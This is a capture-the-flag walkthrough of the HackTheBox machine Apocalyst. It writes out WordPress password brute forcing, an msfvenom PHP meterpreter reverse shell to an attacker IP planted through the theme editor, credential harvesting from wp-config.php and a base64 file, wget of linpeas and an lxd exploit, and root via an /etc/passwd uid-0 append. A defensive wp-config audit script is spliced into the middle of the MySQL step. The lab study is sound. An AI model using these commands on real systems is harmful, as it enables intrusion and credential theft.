HackTheBox Apocalyst

Writeup for HackTheBox Apocalyst

Machine Synopsis

Apocalyst is a fairly straightforward machine, however it requires a wide range of tools and techniques to complete. It touches on many different topics and can be a great learning resource for many. (Source)

Enumeration

❯ nmap -sC -sV 10.10.10.46

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 fd:ab:0f:c9:22:d5:f4:8f:7a:0a:29:11:b4:04:da:c9 (RSA)
|   256 76:92:39:0a:57:bd:f0:03:26:78:c7:db:1a:66:a5:bc (ECDSA)
|_  256 12:12:cf:f1:7f:be:43:1f:d5:e6:6d:90:84:25:c8:bd (ED25519)
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
|_http-generator: WordPress 4.8
|_http-title: Apocalypse Preparation Blog
|_http-server-header: Apache/2.4.18 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Initially, the website looked very basic because it could not load all of its elements from the domain apocalyst.htb. Let's add the domain to our /etc/hosts and try again.

echo -e '10.10.10.46\t\tapocalyst.htb' | sudo tee -a /etc/hosts

(Screenshot: webpage)

Since we know that the website is running on WordPress, we can run wpscan to find known vulnerabilities.

❯ wpscan --url http://10.10.10.46 -e --random-user-agent --api-token <token>
...
[i] User(s) Identified:

[+] falaraki
 | Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 | Confirmed By: Login Error Messages (Aggressive Detection)
...

There were a lot of vulnerabilities shown but none seemed to be useful. The only possible useful information was the user falaraki.

Let's brute force the directories instead.

❯  ffuf -u http://apocalyst.htb/FUZZ/ -w /usr/share/seclists/Discovery/Web-Content/raft-medium-words.txt -e .php -fc 401,403,404
...
main            [Status: 200, Size: 157, Words: 14, Lines: 14, Duration: 4ms]
...
blog            [Status: 200, Size: 157, Words: 14, Lines: 14, Duration: 937ms]
...
wp-login.php    [Status: 200, Size: 2460, Words: 153, Lines: 70, Duration: 22ms]

Most paths return 200 OK with the same 157-byte page, which simply shows the image below; only /wp-login.php returns something different.

(Screenshot: redirect_image)

<!doctype html>

<html lang="en">
<head>
  <meta charset="utf-8">

  <title>End of the world</title>
</head>

<body>
  <img src="image.jpg">
</body>
</html>

Apparently, we are supposed to generate a wordlist from the site itself. Let's use cewl to do so.

❯ cewl apocalyst.htb -w apocalyst.htb.wordlist --with-numbers
❯ head apocalyst.htb.wordlist
the
and
Apocalypse
Revelation
that
Preparation
Blog
end
2017
Book

Let's brute force the directories again with the generated wordlist, this time filtering out responses of size 157, since that is the placeholder image page seen above.

❯ ffuf -u http://apocalyst.htb/FUZZ/ -w apocalyst.htb.wordlist -fs 157
...
Rightiousness           [Status: 200, Size: 175, Words: 18, Lines: 15, Duration: 4ms] 

Accessing http://apocalyst.htb/Rightiousness/ brings us to the same image as before, but the page source is slightly different.

<!doctype html>

<html lang="en">
<head>
  <meta charset="utf-8">

  <title>End of the world</title>
</head>

<body>
  <img src="image.jpg">
  <!-- needle -->
</body>
</html>

This seems like a steganography challenge.

Exploitation

Let's download the image and analyze it.

❯ wget http://apocalyst.htb/Rightiousness/image.jpg

❯ exiftool image.jpg
ExifTool Version Number         : 13.00
File Name                       : image.jpg
Directory                       : .
File Size                       : 216 kB
File Modification Date/Time     : 2017:07:27 18:08:34+08:00
File Access Date/Time           : 2025:01:14 19:59:20+08:00
File Inode Change Date/Time     : 2025:01:14 19:59:20+08:00
File Permissions                : -rw-rw-r--
File Type                       : JPEG
File Type Extension             : jpg
MIME Type                       : image/jpeg
JFIF Version                    : 1.01
Resolution Unit                 : inches
X Resolution                    : 72
Y Resolution                    : 72
Image Width                     : 1920
Image Height                    : 1080
Encoding Process                : Baseline DCT, Huffman coding
Bits Per Sample                 : 8
Color Components                : 3
Y Cb Cr Sub Sampling            : YCbCr4:2:0 (2 2)
Image Size                      : 1920x1080
Megapixels                      : 2.1

Let's try to extract any hidden data from the image with steghide.

❯ steghide extract -sf image.jpg
Enter passphrase: <no password>
wrote extracted data to "list.txt".
❯ head list.txt
World
song
from
disambiguation
Wikipedia
album
page
this
world
Edit

The extracted file is a list of words. Could this be a password list for the user falaraki?

❯ wpscan --url http://apocalyst.htb --passwords list.txt --usernames falaraki
...
[SUCCESS] - falaraki / Transclisiation

(Screenshot: falaraki_login)

After logging into WordPress as falaraki, we can activate the Twenty Seventeen Theme under Appearance.

Thereafter, we can generate a malicious PHP payload with msfvenom and paste it into the index.php of the Twenty Seventeen theme we just activated, using the built-in theme editor.

❯ msfvenom -p php/meterpreter/reverse_tcp lhost=10.10.14.13 lport=1337 -f raw > poc.php

(Screenshot: twenty_seventeen_index)

Finally, we can start a multi/handler listener and trigger the payload by visiting http://apocalyst.htb.

msf6 exploit(multi/handler) > run 
[*] Started reverse TCP handler on 10.10.14.13:1337 
[*] Sending stage (40004 bytes) to 10.10.10.46
[*] Meterpreter session 1 opened (10.10.14.13:1337 -> 10.10.10.46:53584) at 2025-01-14 20:19:44 +0800
meterpreter > shell
Process 3052 created.
Channel 0 created.
python3 -c 'import pty;pty.spawn("/bin/bash")'
www-data@apocalyst:/var/www/html/apocalyst.htb$ cd /home/falaraki
www-data@apocalyst:/home/falaraki$ cat user.txt
91d27152ab28ecd8255d6c67f25ed053

We can also read the wp-config.php file for interesting information.

www-data@apocalyst:/var/www/html$ cat /var/www/html/apocalyst.htb/wp-config.php
...
// ** MySQL settings - You can get this info from your web host ** //
/** The name of the database for WordPress */
define('DB_NAME', 'wp_myblog');

/** MySQL database username */
define('DB_USER', 'root');

/** MySQL database password */
define('DB_PASSWORD', 'Th3SoopaD00paPa5S!');

/** MySQL hostname */
define('DB_HOST', 'localhost');
...

There is a hardcoded MySQL root credential. Let's use it to connect to the MySQL service.
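From the defender's side, both WordPress findings in this writeup are detectable with a simple configuration audit: the theme editor that let a PHP payload be written into index.php can be switched off with the real WordPress constant DISALLOW_FILE_EDIT, and the site should never connect to MySQL as root. The following Python script is an added example, not code from the original writeup or from WordPress; it parses define() statements from wp-config.php content, flags a missing DISALLOW_FILE_EDIT, a root DB_USER and a world-readable file mode. The sample config is constructed (with a placeholder password), and the function names are my own.

```python
import os
import re
import stat
import sys

# Constructed sample mirroring the defines shown in the wp-config.php above.
# The password is a placeholder, not a value from the box.
SAMPLE_WP_CONFIG = """<?php
// ** MySQL settings - You can get this info from your web host ** //
define('DB_NAME', 'wp_myblog');
define('DB_USER', 'root');
define('DB_PASSWORD', 'PLACEHOLDER_PASSWORD');
define('DB_HOST', 'localhost');
"""

# Matches define('NAME', 'string') and define('NAME', true|false).
DEFINE_RE = re.compile(
    r"""define\(\s*['"](\w+)['"]\s*,\s*(?:['"]([^'"]*)['"]|(true|false))\s*\)""",
    re.IGNORECASE,
)


def parse_defines(text):
    """Return {NAME: value} for every define() in wp-config.php; true/false become bool."""
    defines = {}
    for m in DEFINE_RE.finditer(text):
        name, quoted, boolean = m.groups()
        defines[name] = quoted if quoted is not None else boolean.lower() == "true"
    return defines


def audit_wp_config(text, mode=None):
    """Return a list of findings for wp-config.php content.

    mode is the file's st_mode (from os.stat), or None to audit content only.
    """
    findings = []
    d = parse_defines(text)
    # The writeup got code execution by editing a theme file in the built-in
    # editor; DISALLOW_FILE_EDIT set to true removes that editor entirely.
    if d.get("DISALLOW_FILE_EDIT") is not True:
        findings.append("DISALLOW_FILE_EDIT is not set to true: theme/plugin editor is enabled")
    # A root DB account lets a compromised site read every database on the server.
    if str(d.get("DB_USER", "")).lower() == "root":
        findings.append("DB_USER is root: use a dedicated account limited to the WordPress database")
    # Any local user (www-data included) can read credentials from a world-readable config.
    if mode is not None and mode & stat.S_IROTH:
        findings.append("wp-config.php is world-readable")
    return findings


if __name__ == "__main__":
    # Audit a real file when a path is given, otherwise the constructed sample.
    path = sys.argv[1] if len(sys.argv) > 1 else None
    if path:
        with open(path) as f:
            text = f.read()
        mode = os.stat(path).st_mode
    else:
        text, mode = SAMPLE_WP_CONFIG, 0o644
    for finding in audit_wp_config(text, mode) or ["no findings"]:
        print(finding)
```

Run it as `python3 audit_wp_config.py /var/www/html/apocalyst.htb/wp-config.php` on the web host; on the sample it reports all three findings, and a config with a dedicated database user, `define('DISALLOW_FILE_EDIT', true);` and mode 0640 reports none.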

www-data@apocalyst:/var/www/html/apocalyst.htb$ mysql -uroot -p
Enter password: Th3SoopaD00paPa5S!

Welcome to the MySQL monitor.  Commands end with ; or \g.
Your MySQL connection id is 4849
Server version: 5.7.19-0ubuntu0.16.04.1 (Ubuntu)

Copyright (c) 2000, 2017, Oracle and/or its affiliates. All rights reserved.

Oracle is a registered trademark of Oracle Corporation and/or its
affiliates. Other names may be trademarks of their respective
owners.

Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.

mysql> show databases;
+--------------------+
| Database           |
+--------------------+
| information_schema |
| mysql              |
| performance_schema |
| sys                |
| wp_myblog          |
+--------------------+
5 rows in set (0.00 sec)

mysql> use wp_myblog;
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A

Database changed
mysql> show tables;
+-----------------------+
| Tables_in_wp_myblog   |
+-----------------------+
| wp_commentmeta        |
| wp_comments           |
| wp_links              |
| wp_options            |
| wp_postmeta           |
| wp_posts              |
| wp_term_relationships |
| wp_term_taxonomy      |
| wp_termmeta           |
| wp_terms              |
| wp_usermeta           |
| wp_users              |
+-----------------------+
12 rows in set (0.00 sec)

mysql> select * from wp_users;
+----+------------+------------------------------------+---------------+---------------------+----------+---------------------+---------------------+-------------+--------------+
| ID | user_login | user_pass                          | user_nicename | user_email          | user_url | user_registered     | user_activation_key | user_status | display_name |
+----+------------+------------------------------------+---------------+---------------------+----------+---------------------+---------------------+-------------+--------------+
|  1 | falaraki   | $P$BnK/Jm451thx39mQg0AFXywQWZ.e6Z. | falaraki      | admin@apocalyst.htb |          | 2017-07-27 09:33:13 |                     |           0 | falaraki     |
+----+------------+------------------------------------+---------------+---------------------+----------+---------------------+---------------------+-------------+--------------+

We found the password hash for the falaraki user, but it did not crack with john or hashcat.

Listing all files in falaraki's home directory shows an interesting .secret file that appears to contain base64-encoded data.

www-data@apocalyst:/home/falaraki$ ls -la
total 44
drwxr-xr-x 4 falaraki falaraki 4096 Jul 27  2017 .
drwxr-xr-x 3 root     root     4096 Jul 26  2017 ..
-rw------- 1 falaraki falaraki  516 Jul 27  2017 .bash_history
-rw-r--r-- 1 falaraki falaraki  220 Jul 26  2017 .bash_logout
-rw-r--r-- 1 falaraki falaraki 3771 Jul 26  2017 .bashrc
drwx------ 2 falaraki falaraki 4096 Jul 26  2017 .cache
drwxrwxr-x 2 falaraki falaraki 4096 Jul 26  2017 .nano
-rw-r--r-- 1 falaraki falaraki  655 Jul 26  2017 .profile
-rw-rw-r-- 1 falaraki falaraki  109 Jul 26  2017 .secret
-rw-r--r-- 1 falaraki falaraki    0 Jul 26  2017 .sudo_as_admin_successful
-rw-r--r-- 1 root     root     1024 Jul 27  2017 .wp-config.php.swp
-rw-rw-r-- 1 falaraki falaraki   33 Jan 14 06:59 user.txt
www-data@apocalyst:/home/falaraki$ cat .secret
S2VlcCBmb3JnZXR0aW5nIHBhc3N3b3JkIHNvIHRoaXMgd2lsbCBrZWVwIGl0IHNhZmUhDQpZMHVBSU50RzM3VGlOZ1RIIXNVemVyc1A0c3M=

Let's decode .secret.

www-data@apocalyst:/home/falaraki$ cat .secret | base64 -d
Keep forgetting password so this will keep it safe!
Y0uAINtG37TiNgTH!sUzersP4ss

The second line is a password, so now we can SSH into the host as falaraki.

❯ ssh falaraki@10.10.10.46
The authenticity of host '10.10.10.46 (10.10.10.46)' can't be established.
ED25519 key fingerprint is SHA256:PVDveF1cC5VrDOAvRxNQhmBpPRjTLbRGDdGcdM3wkLM.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.10.10.46' (ED25519) to the list of known hosts.
falaraki@10.10.10.46's password: Y0uAINtG37TiNgTH!sUzersP4ss
Welcome to Ubuntu 16.04.2 LTS (GNU/Linux 4.4.0-62-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

120 packages can be updated.
61 updates are security updates.


Last login: Thu Jul 27 12:09:11 2017 from 10.0.2.15

falaraki@apocalyst:~$

Privilege Escalation

Let's run sudo -l to check what sudo privileges the falaraki user has.

falaraki@apocalyst:~$ sudo -l
[sudo] password for falaraki: 
Sorry, user falaraki may not run sudo on apocalyst.

None, so let's run linpeas.sh to look for other interesting information instead.

falaraki@apocalyst:~$ cd /tmp
falaraki@apocalyst:/tmp$ wget http://10.10.14.13/linpeas.sh
falaraki@apocalyst:/tmp$ chmod +x linpeas.sh 
falaraki@apocalyst:/tmp$ ./linpeas.sh
...
uid=1000(falaraki) gid=1000(falaraki) groups=1000(falaraki),4(adm),24(cdrom),30(dip),46(plugdev),110(lxd),115(lpadmin),116(sambashare)
...
═╣ Writable passwd file? ................ /etc/passwd is writable
...

It looks like there are two ways to escalate privileges: the writable /etc/passwd and membership of the lxd group.

Writable /etc/passwd

Let's compute a hash of the string password using openssl passwd.

❯ openssl passwd password
$1$.1kY7r64$jjgp0NvAkDewQqY3xGmSp0

The format of /etc/passwd is [username]:[password hash]:[userid]:[groupid]:[comment]:[home dir]:[shell].

We can now append a new user with uid 0 and the hash above to /etc/passwd, which makes that user root.

falaraki@apocalyst:/tmp$ echo 'shiro:$1$.1kY7r64$jjgp0NvAkDewQqY3xGmSp0:0:0:shiro:/root:/bin/bash' >> /etc/passwd
falaraki@apocalyst:/tmp$ su shiro
Password: 
root@apocalyst:/tmp# 
root@apocalyst:/tmp# cat /root/root.txt
2ec738b9164708fc65c56cc5ca7f8eb0

LXD

Since falaraki is in the lxd group, we can use the lxd privilege escalation exploit from this GitHub repo.

❯ wget https://raw.githubusercontent.com/0bfxgh0st/lxd-privesc-exploit/refs/heads/main/lxd-privesc-exploit.sh -O lxd-privesc-exploit.sh
❯ python3 -m http.server 80
falaraki@apocalyst:/tmp$ wget http://10.10.14.13/lxd-privesc-exploit.sh
falaraki@apocalyst:/tmp$ chmod +x lxd-privesc-exploit.sh 
falaraki@apocalyst:/tmp$ ./lxd-privesc-exploit.sh 
[+] Building lxd privesc exploit
error: This must be run as root
Image imported with fingerprint: 6660ba8332f9ae75637afe2e6713f1e257163aa6c7ae3c8e338392d117dcb7ba
Creating x0bfxgh0st
Device container added to x0bfxgh0st
~ # 
~ # ls -la /mnt
total 93
drwxr-xr-x   23 root     root          4096 Jul 26  2017 .
drwxr-xr-x   19 root     root          4096 Jan 14 13:14 ..
drwxr-xr-x    2 root     root          4096 Jul 26  2017 bin
drwxr-xr-x    4 root     root          1024 Jul 26  2017 boot
drwxr-xr-x   20 root     root          4300 Jan 14 06:58 dev
drwxr-xr-x   92 root     root          4096 Jul 27  2017 etc
drwxr-xr-x    3 root     root          4096 Jul 26  2017 home
lrwxrwxrwx    1 root     root            32 Jul 26  2017 initrd.img -> boot/initrd.img-4.4.0-62-generic
drwxr-xr-x   22 root     root          4096 Jul 26  2017 lib
drwxr-xr-x    2 root     root          4096 Jul 26  2017 lib64
drwx------    2 root     root         16384 Jul 26  2017 lost+found
drwxr-xr-x    3 root     root          4096 Jul 26  2017 media
drwxr-xr-x    2 root     root          4096 Feb 15  2017 mnt
drwxr-xr-x    2 root     root          4096 Feb 15  2017 opt
dr-xr-xr-x  217 root     root             0 Jan 14 06:58 proc
drwx------    4 root     root          4096 Jan 14 06:59 root
drwxr-xr-x   27 root     root           940 Jan 14 13:14 run
drwxr-xr-x    2 root     root         12288 Jul 26  2017 sbin
drwxr-xr-x    2 root     root          4096 Jan 14  2017 snap
drwxr-xr-x    2 root     root          4096 Feb 15  2017 srv
dr-xr-xr-x   13 root     root             0 Jan 14 06:58 sys
drwxrwxrwt   10 root     root          4096 Jan 14 13:17 tmp
drwxr-xr-x   10 root     root          4096 Jul 26  2017 usr
drwxr-xr-x   14 root     root          4096 Jul 26  2017 var
lrwxrwxrwx    1 root     root            29 Jul 26  2017 vmlinuz -> boot/vmlinuz-4.4.0-62-generic
/mnt # cat root/root.txt 
2ec738b9164708fc65c56cc5ca7f8eb0
This post is licensed under CC BY 4.0 by the author.